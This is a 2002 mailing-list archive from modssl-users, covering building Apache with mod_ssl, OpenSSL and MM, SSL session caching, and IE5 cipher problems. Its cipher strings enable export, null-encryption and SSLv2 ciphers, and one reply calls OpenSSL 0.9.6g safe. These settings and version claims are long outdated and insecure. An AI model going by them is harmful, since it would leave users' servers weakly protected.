LD_LIBRARY_PATH=3D/${TARGET_DIR}/${MM}/lib:/${TARGET_DIR}/${MM}/=
bin:$LD_LIBRARY_PATH
export=20
LD_LIBRARY_PATH


 


 


2) Comile openssl


In the openssl-dir do =



 


./config =
--prefix=3D/${TARGET_DIR}/${OPENSSL}=20
-fPIC shared


 


After making openssl =
do


 


export=20
SSL_BASE=3D/${TARGET_DIR}/${OPENSSL}
LD_LIBRARY_PATH=3D/${TARGET_DIR}/${OPENSSL}/li=
b:/${TARGET_DIR}/${OPENSSL}/bin::$LD_LIBRARY_PATH
export=20
LD_LIBRARY_PATH


 


3)  Apply mod_ssl to apache source=20
tree


Changing to SUBDIR where you keep your =
sources for=20
mod_ssl



Do 


 


CC=3D${COMPILER}=20
\
CPFLAGS=3D"-I/${TARGET_DIR}/${OPENSSL}/include"=20
\
CFLAGS=3D"`../${MM}/mm-config --cflags`"=20
\
LDFLAGS=3D"-L/${TARGET_DIR}/${OPENSSL}/lib `../${MM}/mm-config =
--ldflags`"=20
\
LIBS=3D"-lm `../${MM}/mm-config --libs`"=20
\
EAPI_MM=3D"../${MM}"
./configure =
--prefix=3D/${TARGET_DIR}/${APACHE}=20
\
          &=
nbsp;=20
--enable-rule=3DEAPI=20
\
           =20
--with-apache=3D../${APACHE}=20
\
           =20
--with-ssl=3D../${OPENSSL}=20
\
           =20
--with-mm=3D../${MM}=20
\
           =20
--disable-rule=3DSSL_COMPAT=20
\
           =20
--enable-module=3Dssl 


 


 


4) For=20
the configuration of Apache you'll need to specify:


 


If you=20
do not need to specifiy anything else, change to apaches source dir and =
type=20
'make', in any other case do change to apaches source dir and do=20



 


CC=3D"${COMPILER}" \
EAPI_MM=3D"../${MM}"=20
\
CPFLAGS=3D"-I/${TARGET_DIR}/${OPENSSL}/include"=20
\
CFLAGS=3D"`../${MM}/mm-config --cflags`"=20
\
LDFLAGS=3D"-L/${TARGET_DIR}/${OPENSSL}/lib `../${MM}/mm-config =
--ldflags`"=20
\
LIBS=3D"`../${MM}/mm-config --libs`"=20
\
INCLUDE=3D"-I/${TARGET_DIR}/${OPENSSL}/include=20
-I/${TARGET_DIR}/${MM}/include" \
./configure=20
--prefix=3D/${TARGET_DIR}/${APACHE}=20
\
           =20
--enable-rule=3DEAPI=20
\
           =20
--enable-module=3Dssl=20
\
            =
--add=20
more options if needed


 


 


This=20
should make shared mem available for apache/mod_ssl. =



 


BTW:=20
Which platform are you using?


 


Hope=20
this helps - good luck


 


 


Kind=20
regards,


Bert=20
Courtin


 






  
-----Original Message-----
From: Gilles Gros=20
  [mailto:gillesg@whitepj.com]
Sent: Wednesday, October 09, =
2002 7:09=20
  AM
To: modssl-users@modssl.org
Subject: httpd.conf =
with=20
  mod_ssl and MM


  
Hi,

  
 

  
Having just=20
  heard about MM, I am trying to use it.

  
 

  
I compile my=20
  apache, but when I try to start it, I get :

  
 

  
 

  
Syntax error on line 59 of=20
  /opt/apache/conf/local_conf/mod_ssl.conf:
SSLSessionCache: shared =
memory=20
  cache not useable on this platform

  
 

  
 

  
and line 59 there is : 

  
SSLSessionCache     &=
nbsp;  =20
  shmcb:/usr/local/apache/logs/ssl_scache(512000)

  
 

  
How =
can I take=20
  advantage of shmcb and shmct as=20
  SSLSessionCache methods.

  
 

  
Thanks.

  
 

  
Gilles 

  


  

 

  
 


------_=_NextPart_001_01C26F63.E087968D--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 09:29:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA28114; Wed, 9 Oct 2002 09:28:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tonnant.cnchost.com id JAA28099; Wed, 9 Oct 2002 09:27:35 +0200 (MET DST)
Received: from LAP012 (adsl-64-171-24-81.dsl.sntc01.pacbell.net [64.171.24.81])
	by tonnant.cnchost.com
	id DAA02259; Wed, 9 Oct 2002 03:27:29 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: "Courtin Bert" , 
Subject: RE: httpd.conf with mod_ssl and MM
Date: Wed, 9 Oct 2002 00:27:16 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0012_01C26F2A.9EF919F0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <60F1F87A64834D45A1EBAE9618305FB86ECDE1@qeo00200>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0012_01C26F2A.9EF919F0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

I am using Linux

Thanks for your help. It set me on the right tracks.
It is working now.
I used a different build method, because I already have a makefile

Can you give me some pointer on the difference between
SSLCacheSession dbm and shm and shmct and shmcb.

Thanks

Gilles


  -----Original Message-----
  From: Courtin Bert [mailto:b.courtin@t-online.net]
  Sent: Wednesday, October 09, 2002 12:17 AM
  To: modssl-users@modssl.org
  Cc: gillesg@whitepj.com
  Subject: RE: httpd.conf with mod_ssl and MM


  Hi Gilles,

  1) Put all the necessary sources to a dir below e.g. SOURCES. Make =
sure you use the latest ones available as recently some mayor security =
fixes had been done.

  All the following works fine on solaris 8 with a gcc

  -> SOURCES/apache-1.3.27
  -> SOURCES/mm-1.2.1
  -> SOURCES/mod_ssl-2.8.11-1.3.27
  -> SOURCES/openssl-0.9.6.g


  2) Assume the following set up for some variables=20

  COMPILER=3D"gcc"                                  # Specify the =
compiler to use
  TARGET_DIR=3D"opt"                                # This is where the =
*compiled* sources will be installed
  SOURCES_SUBDIR=3D"SOURCES"          # To this subdir the zipped =
sources will be unzipped and untared
  APACHE_DIR=3D"apache-1.3.27"               # Now we're defining the =
names of the subdirectories for the program sources
  MM_DIR=3D"mm-1.2.1"                              # Most arcives will =
be extracted to a subdirname related to the arcive
  OPENSSL_DIR=3D"openssl-0.9.6g"             # filename but e.g. =
"c-client.tar.Z will be extracted to "imap-2001a"
  MODSSL_DIR=3D"mod_ssl-2.8.11-1.3.27"    # will be detected =
automatically below based on the info you state here.


  2) Compile MM

  mm has to be configured someting like this (on solaris using gcc):

  ./configure --prefix=3D/${TARGET_DIR}/${MM} \
          --with-gcc \
          --disable-shared=20

  maybe you'll also specify (but not nec needed)

          --enable-batch \
          --with-shm=3DIPCSHM


  After this, you may need to do=20

  =
LD_LIBRARY_PATH=3D/${TARGET_DIR}/${MM}/lib:/${TARGET_DIR}/${MM}/bin:$LD_L=
IBRARY_PATH
  export LD_LIBRARY_PATH



  2) Comile openssl
  In the openssl-dir do=20

  ./config --prefix=3D/${TARGET_DIR}/${OPENSSL} -fPIC shared

  After making openssl do

  export SSL_BASE=3D/${TARGET_DIR}/${OPENSSL}
  =
LD_LIBRARY_PATH=3D/${TARGET_DIR}/${OPENSSL}/lib:/${TARGET_DIR}/${OPENSSL}=
/bin::$LD_LIBRARY_PATH
  export LD_LIBRARY_PATH


  3)  Apply mod_ssl to apache source tree

  Changing to SUBDIR where you keep your sources for mod_ssl

  Do=20

  CC=3D${COMPILER} \
  CPFLAGS=3D"-I/${TARGET_DIR}/${OPENSSL}/include" \
  CFLAGS=3D"`../${MM}/mm-config --cflags`" \
  LDFLAGS=3D"-L/${TARGET_DIR}/${OPENSSL}/lib `../${MM}/mm-config =
--ldflags`" \
  LIBS=3D"-lm `../${MM}/mm-config --libs`" \
  EAPI_MM=3D"../${MM}"
  ./configure --prefix=3D/${TARGET_DIR}/${APACHE} \
              --enable-rule=3DEAPI \
              --with-apache=3D../${APACHE} \
              --with-ssl=3D../${OPENSSL} \
              --with-mm=3D../${MM} \
              --disable-rule=3DSSL_COMPAT \
              --enable-module=3Dssl=20


  4) For the configuration of Apache you'll need to specify:

  If you do not need to specifiy anything else, change to apaches source =
dir and type 'make', in any other case do change to apaches source dir =
and do=20

  CC=3D"${COMPILER}" \
  EAPI_MM=3D"../${MM}" \
  CPFLAGS=3D"-I/${TARGET_DIR}/${OPENSSL}/include" \
  CFLAGS=3D"`../${MM}/mm-config --cflags`" \
  LDFLAGS=3D"-L/${TARGET_DIR}/${OPENSSL}/lib `../${MM}/mm-config =
--ldflags`" \
  LIBS=3D"`../${MM}/mm-config --libs`" \
  INCLUDE=3D"-I/${TARGET_DIR}/${OPENSSL}/include =
-I/${TARGET_DIR}/${MM}/include" \
  ./configure --prefix=3D/${TARGET_DIR}/${APACHE} \
              --enable-rule=3DEAPI \
              --enable-module=3Dssl \
              --add more options if needed


  This should make shared mem available for apache/mod_ssl.=20

  BTW: Which platform are you using?

  Hope this helps - good luck


  Kind regards,
  Bert Courtin



    -----Original Message-----
    From: Gilles Gros [mailto:gillesg@whitepj.com]
    Sent: Wednesday, October 09, 2002 7:09 AM
    To: modssl-users@modssl.org
    Subject: httpd.conf with mod_ssl and MM


    Hi,

    Having just heard about MM, I am trying to use it.

    I compile my apache, but when I try to start it, I get :


    Syntax error on line 59 of /opt/apache/conf/local_conf/mod_ssl.conf:
    SSLSessionCache: shared memory cache not useable on this platform


    and line 59 there is :=20
    SSLSessionCache         =
shmcb:/usr/local/apache/logs/ssl_scache(512000)

    How can I take advantage of shmcb and shmct as SSLSessionCache =
methods.

    Thanks.

    Gilles=20



    =20


------=_NextPart_000_0012_01C26F2A.9EF919F0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable







I am=20
using Linux


 


Thanks=20
for your help. It set me on the right tracks.


It is=20
working now.


I used=20
a different build method, because I already have a =
makefile


 


Can=20
you give me some pointer on the difference between


SSLCacheSession dbm and shm and shmct =
and=20
shmcb.


 


Thanks


 


Gilles


 


 



  
-----Original Message-----
From: Courtin Bert=20
  [mailto:b.courtin@t-online.net]
Sent: Wednesday, October 09, =
2002=20
  12:17 AM
To: modssl-users@modssl.org
Cc:=20
  gillesg@whitepj.com
Subject: RE: httpd.conf with mod_ssl and =

  MM


  
Hi=20
  Gilles,

  
 

  
1)=20
  Put all the necessary sources to a dir below e.g. SOURCES. Make sure =
you use=20
  the latest ones available as recently some mayor security fixes had =
been=20
  done.

  
 

  
All=20
  the following works fine on solaris 8 with a gcc

  
 

  
-> SOURCES/apache-1.3.27

  
-> SOURCES/mm-1.2.1

  

  
-> SOURCES/mod_ssl-2.8.11-1.3.27

  

  
->=20
  =
SOURCES/openssl-0.9.6.g

  
 

  
 

  
2)=20
  Assume the following set up for some variables 

  
 

  
COMPILER=3D"gcc"        =
            &=
nbsp;           &n=
bsp;=20
  # Specify the compiler to use

  
TARGET_DIR=3D"opt"       &nbs=
p;            =
;          =20
   # This is where the *compiled* sources will be=20
  installed
SOURCES_SUBDIR=3D"SOURCES"      &n=
bsp; =20
   # To this subdir the zipped sources will be unzipped and=20
  untared

  
APACHE_DIR=3D"apache-1.3.27"      =
       =20
   # Now we're defining the names of the subdirectories for the =
program=20
  =
sources
MM_DIR=3D"mm-1.2.1"       &=
nbsp;           &n=
bsp;      =20
     # Most arcives will be extracted to a subdirname related =
to the=20
  =
arcive
OPENSSL_DIR=3D"openssl-0.9.6g"     &nb=
sp;     =20
   # filename but e.g. "c-client.tar.Z will be extracted to=20
  "imap-2001a"
MODSSL_DIR=3D"mod_ssl-2.8.11-1.3.27"   =
 # will be=20
  detected automatically below based on the info you state=20
  here.

  
 

  
2)=20
  Compile MM

  
 

  
mm=20
  has to be configured someting like this (on solaris using=20
  gcc):

  
 

  
./configure --prefix=3D/${TARGET_DIR}/${MM}=20
  \
        --with-gcc=20
  \
        --disable-shared=20
  

  
 

  
maybe you'll also specify (but not nec needed)

  

        --enable-batch=20
  \
        =
--with-shm=3DIPCSHM

  
 

  
 

  
After this, you may need to =
do=20
  

  
LD_LIBRARY_PATH=3D/${TARGET_DIR}/${MM}/lib:/${TARGET_DIR}/${MM}/=
bin:$LD_LIBRARY_PATH
export=20
  LD_LIBRARY_PATH

  
 

  
 

  
2) Comile openssl

  
In the openssl-dir do =


  
 

  
./config=20
  --prefix=3D/${TARGET_DIR}/${OPENSSL} -fPIC shared

  
 

  
After making openssl =
do

  
 

  
export=20
  SSL_BASE=3D/${TARGET_DIR}/${OPENSSL}
LD_LIBRARY_PATH=3D/${TARGET_DIR}/${OPENSSL}/li=
b:/${TARGET_DIR}/${OPENSSL}/bin::$LD_LIBRARY_PATH
export=20
  LD_LIBRARY_PATH

  
 

  
3)  Apply mod_ssl to apache source=20
  tree

  
Changing to SUBDIR where you keep your =
sources for=20
  mod_ssl

  

Do 

  
 

  
CC=3D${COMPILER}=20
  \
CPFLAGS=3D"-I/${TARGET_DIR}/${OPENSSL}/include"=20
  \
CFLAGS=3D"`../${MM}/mm-config --cflags`"=20
  \
LDFLAGS=3D"-L/${TARGET_DIR}/${OPENSSL}/lib `../${MM}/mm-config =
--ldflags`"=20
  \
LIBS=3D"-lm `../${MM}/mm-config --libs`"=20
  \
EAPI_MM=3D"../${MM}"
./configure =
--prefix=3D/${TARGET_DIR}/${APACHE}=20
  =
\
          &=
nbsp;=20
  --enable-rule=3DEAPI=20
  =
\
           =20
  --with-apache=3D../${APACHE}=20
  =
\
           =20
  --with-ssl=3D../${OPENSSL}=20
  =
\
           =20
  --with-mm=3D../${MM}=20
  =
\
           =20
  --disable-rule=3DSSL_COMPAT=20
  =
\
           =20
  --enable-module=3Dssl 

  
 

  
 

  
4)=20
  For the configuration of Apache you'll need to =
specify:

  
 

  
If=20
  you do not need to specifiy anything else, change to apaches source =
dir and=20
  type 'make', in any other case do change to apaches source dir and do=20
  

  
 

  
CC=3D"${COMPILER}" \
EAPI_MM=3D"../${MM}"=20
  \
CPFLAGS=3D"-I/${TARGET_DIR}/${OPENSSL}/include"=20
  \
CFLAGS=3D"`../${MM}/mm-config --cflags`"=20
  \
LDFLAGS=3D"-L/${TARGET_DIR}/${OPENSSL}/lib `../${MM}/mm-config =
--ldflags`"=20
  \
LIBS=3D"`../${MM}/mm-config --libs`"=20
  \
INCLUDE=3D"-I/${TARGET_DIR}/${OPENSSL}/include=20
  -I/${TARGET_DIR}/${MM}/include" \
./configure=20
  --prefix=3D/${TARGET_DIR}/${APACHE}=20
  =
\
           =20
  --enable-rule=3DEAPI=20
  =
\
           =20
  --enable-module=3Dssl=20
  =
\
            =
--add=20
  more options if needed

  
 

  
 

  
This=20
  should make shared mem available for apache/mod_ssl. =


  
 

  
BTW:=20
  Which platform are you using?

  
 

  
Hope=20
  this helps - good luck

  
 

  
 

  
Kind=20
  regards,

  
Bert=20
  Courtin

  
 

  


  

    
-----Original Message-----
From: Gilles Gros=20
    [mailto:gillesg@whitepj.com]
Sent: Wednesday, October 09, =
2002=20
    7:09 AM
To: modssl-users@modssl.org
Subject: =
httpd.conf=20
    with mod_ssl and MM


    
Hi,

    
 

    
Having=20
    just heard about MM, I am trying to use =
it.

    
 

    
I compile=20
    my apache, but when I try to start it, I get =
:

    
 

    
 

    
Syntax error on line 59 of=20
    /opt/apache/conf/local_conf/mod_ssl.conf:
SSLSessionCache: shared =
memory=20
    cache not useable on this platform

    
 

    
 

    
and line 59 there is : =


    
SSLSessionCache     &=
nbsp;  =20
    shmcb:/usr/local/apache/logs/ssl_scache(512000)

    
 

    
How can I take=20
    advantage of shmcb and shmct as=20
    SSLSessionCache methods.

    
 

    
Thanks.

    
 

    
Gilles 

    


    

 

    
 


------=_NextPart_000_0012_01C26F2A.9EF919F0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 09:50:36 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id JAA28597; Wed, 9 Oct 2002 09:49:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id JAA28581; Wed, 9 Oct 2002 09:49:01 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g997mes15472
	for ; Wed, 9 Oct 2002 08:48:45 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <4FXKFDFB>; Wed, 9 Oct 2002 08:48:35 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F217E@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Site for modssl.org
Date: Wed, 9 Oct 2002 08:48:33 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

An rpm for mod_ssl comes with Red Hat 7.2 (I assume that's what you are
referring to). As for latest, there should be an update available from Red
Hat fairly soon. 

- 
John Airey, BSc (Jt Hons), CNA, RHCE 
Internet systems support officer, ITCSD, Royal National Institute of the
Blind, 
Bakewell Road, Peterborough PE2 6XU, 
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 
Theories of evolution are like buses - there'll be another one along in a
minute
 
-----Original Message-----
From: Robert Lagana [mailto:Robert.Lagana@entrust.com]
Sent: 08 October 2002 18:02
To: 'modssl-users@modssl.org'
Subject: Site for modssl.org




Hi, 
I can't hit http://www.modssl.org 
I'm in need of the latest rpm or tarball for linux 7.2 
Does anyone have another site I could use to download? 
Thanks, 
Rob 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 10:19:49 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA29969; Wed, 9 Oct 2002 10:18:53 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailgate5.cinetic.de id KAA29802; Wed, 9 Oct 2002 10:16:20 +0200 (MET DST)
Received: from web.de (fmomail02.dlan.cinetic.de [172.20.1.46])
	by mailgate5.cinetic.de (8.11.2/8.11.2/SuSE Linux 8.11.0-0.4) with SMTP id g998GFX23975
	for modssl-users@modssl.org; Wed, 9 Oct 2002 10:16:15 +0200
Date: Wed, 9 Oct 2002 10:16:15 +0200
Message-Id: <200210090816.g998GFX23975@mailgate5.cinetic.de>
MIME-Version: 1.0
Organization: http://freemail.web.de/
From: Janek Richter 
To: modssl-users@modssl.org
Subject: 
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Janek Richter 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

i'm using Apache/2.0.42 with integrated mod_ssl/2.0.42. Is it possible to upgrade to a higher version or is it the latest/SECURE release of modssl for apache 2?
Lots of security scanner (nessus, slapperscan..) had found an https/ssl security hole.

Apache start message:
Apache/2.0.42 (Unix) mod_ssl/2.0.42 OpenSSL/0.9.6g configured -- resuming normal operations


thanks, Janek



______________________________________________________________________________
Jetzt testen fur 1 Euro! Ihr All-in-one-Paket! 
https://digitaledienste.web.de/Club/?mc=021106

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 10:25:50 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA00258; Wed, 9 Oct 2002 10:24:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id KAA00199; Wed, 9 Oct 2002 10:22:32 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g998MRa22113
	for ; Wed, 9 Oct 2002 10:22:27 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Wed Oct 09 10:22:26 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 9 Oct 2002 10:22:27 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 9 Oct 2002 10:22:26 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.86]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 9 Oct 2002 10:22:26 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: RE: 
Date: Wed, 9 Oct 2002 10:22:26 +0200
Message-ID: 
Thread-Topic: 
Thread-Index: AcJvbM5yE585uG7CQ9mo/ywViqCQHAAACUWw
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 09 Oct 2002 08:22:26.0641 (UTC) FILETIME=[00449C10:01C26F6D]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id KAA00211
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

As long as you have OpenSSL 0.9.6g then you are fine.


-----Original Message-----
From: Janek Richter [mailto:janek.richter@bsd-daemon.org]
Sent: 09 October 2002 10:16
To: modssl-users@modssl.org
Subject: 


Hello,

i'm using Apache/2.0.42 with integrated mod_ssl/2.0.42. Is it possible
to upgrade to a higher version or is it the latest/SECURE release of
modssl for apache 2?
Lots of security scanner (nessus, slapperscan..) had found an
https/ssl security hole.

Apache start message:
Apache/2.0.42 (Unix) mod_ssl/2.0.42 OpenSSL/0.9.6g configured --
resuming normal operations


thanks, Janek



______________________________________________________________________
________
Jetzt testen fur 1 Euro! Ihr All-in-one-Paket! 
https://digitaledienste.web.de/Club/?mc=021106

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 11:11:29 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA02879; Wed, 9 Oct 2002 11:10:55 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA02691; Wed, 9 Oct 2002 11:09:30 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C00B54CE747; Wed,  9 Oct 2002 11:09:27 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E441D2882B; Wed,  9 Oct 2002 10:47:27 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mailgate5.cinetic.de id KAA29968; Wed, 9 Oct 2002 10:18:48 +0200 (MET DST)
Received: from web.de (fmomail02.dlan.cinetic.de [172.20.1.46])
	by mailgate5.cinetic.de (8.11.2/8.11.2/SuSE Linux 8.11.0-0.4) with SMTP id g998IgX29510
	for modssl-users@modssl.org; Wed, 9 Oct 2002 10:18:42 +0200
Date: Wed, 9 Oct 2002 10:18:42 +0200
Message-Id: <200210090818.g998IgX29510@mailgate5.cinetic.de>
MIME-Version: 1.0
Organization: http://freemail.web.de/
From: "Janek Richter" 
To: modssl-users@modssl.org
Subject: modssl and apache2
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Janek Richter" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

i'm using Apache/2.0.42 with integrated mod_ssl/2.0.42. Is it possible to upgrade to a higher version or is it the latest/SECURE release of modssl for apache 2?
Lots of security scanner (nessus, slapperscan..) had found an https/ssl security hole.

Apache start message:
Apache/2.0.42 (Unix) mod_ssl/2.0.42 OpenSSL/0.9.6g configured -- resuming normal operations


thanks, Janek



______________________________________________________________________________
Die clevere Geldreserve: der DiBa-Privatkredit. Funktioniert wie ein Dispo, 
ist aber viel gunstiger! Alle Infos: http://diba.web.de/?mc=021104
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 11:36:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA04000; Wed, 9 Oct 2002 11:35:28 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp2.cp.tin.it id LAA03989; Wed, 9 Oct 2002 11:35:00 +0200 (MET DST)
Received: from sviluppo1 (213.45.46.90) by smtp2.cp.tin.it (6.5.019)
        id 3D929F750055F75E for modssl-users@modssl.org; Wed, 9 Oct 2002 11:34:47 +0200
Message-ID: <00a301c26f77$111538b0$33fda8c0@sviluppo1>
From: "Ermanno Iannacci" 
To: 
Subject: More on IE 5 "Document not found"
Date: Wed, 9 Oct 2002 11:34:27 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ermanno Iannacci" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I'm setting up a SSL website, and, like the most, I faced some problem with
IE5 about SSLv3 connections.
It's true that unsetting SSLv3 in preferences solve the problem, but I can't
say everyone to change settings.
Reading this maling list I've found the SSLCipherSuite magic string:

ALL:!ADH:!EXPORT56:-SSLv3:RC4:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

Sadly, this didn't work for me.
Some IE 5.0 keep giving me "Document not found" errors, and some time same
browsers behave differently on different platform (that is, IE5 on NTW
works, IE5 on Win98 does not).

I started using OpenSSL to test a website that I knew working without
problems (https://www.sportscommesse.it/, if you liked to try).
With OpenSSL s_client, I read SSLv3 ciphers, and I found this website used
RC4-SHA.
Mine gave EDH-RSA-DES-CBC3-SHA.
Does IE5 only like RC4?

So I modified SSLCipherSuite this way:

"ALL:!ADH:-SSLv3:RC4:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP"

Problems have disappeared.
I would like to know if I'm losing some security or functionality doing
this.
Thank you.

Ermanno

BTW, what's happening to www.modssl.org website?

"Fletto i muscoli,
e sono nel vuoto"

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct  9 18:48:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA26843; Wed, 9 Oct 2002 18:47:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from slb-smtpout-01.boeing.com id SAA26838; Wed, 9 Oct 2002 18:46:48 +0200 (MET DST)
Received: from stl-av-02.boeing.com ([192.76.190.7])
	by slb-smtpout-01.boeing.com (8.9.2/8.8.5-M2) with ESMTP id JAA17196
	for ; Wed, 9 Oct 2002 09:46:47 -0700 (PDT)
Received: from blv-hub-01.boeing.com (localhost [127.0.0.1])
	by stl-av-02.boeing.com (8.9.3/8.9.2/MBS-AV-02) with ESMTP id LAA24040
	for ; Wed, 9 Oct 2002 11:46:46 -0500 (CDT)
Received: from slopok.roses.bna.boeing.com (slopok.roses.bna.boeing.com [141.102.33.160])
	by blv-hub-01.boeing.com (8.11.3/8.11.3/MBS-LDAP-01) with ESMTP id g99GkgF06524
